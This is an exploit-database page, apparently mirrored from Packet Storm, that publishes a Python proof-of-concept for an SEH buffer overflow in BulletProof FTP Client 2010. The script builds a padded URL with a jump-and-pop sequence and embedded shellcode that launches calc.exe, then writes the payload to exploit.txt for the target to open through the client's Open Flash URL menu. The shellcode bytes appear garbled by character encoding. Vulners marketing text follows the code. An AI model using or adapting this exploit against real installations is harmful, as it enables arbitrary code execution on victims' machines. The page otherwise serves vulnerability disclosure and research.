Lucene search
K

Bulletproof FTP Client 2010 Buffer Overflow

🗓️ 19 Aug 2014 00:00:00Reported by metacomType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Buffer Overflow in BulletProof FTP Client 201

Code
`# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)  
#!/usr/bin/python  
# coding: utf-8  
# Tested on: Windows XP SP3 EN  
# Version: 2010.75.0.76  
# Date: 19.08.2014   
# Author: metacom  
  
# Credit to previous exploits:  
# + http://www.exploit-db.com/exploits/34162/ by Gabor Seljan  
# + http://www.exploit-db.com/exploits/18716/ by Vulnerability-Lab  
  
# Download link: http://www.bpftp.com/   
# Open the -ENTER URL- in filename via File -> Open Flash URL\n";  
  
  
head="http://"  
junk ="\x41" * 89  
  
# 1.\xeb\x06\x90\x90"   
# 2.74C9DE3E 5F POP EDI oleacc.dll  
# jump + pop + ShellCode calc.exe Encryption  
  
junk+=("됐>ÞÉt1ÉQhcalcT¸Ç“ÂwÿÐ")  
  
exploit=head + junk   
try:  
out_file = open("exploit.txt",'w')  
out_file.write(exploit)  
out_file.close()  
except:  
print "Error"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation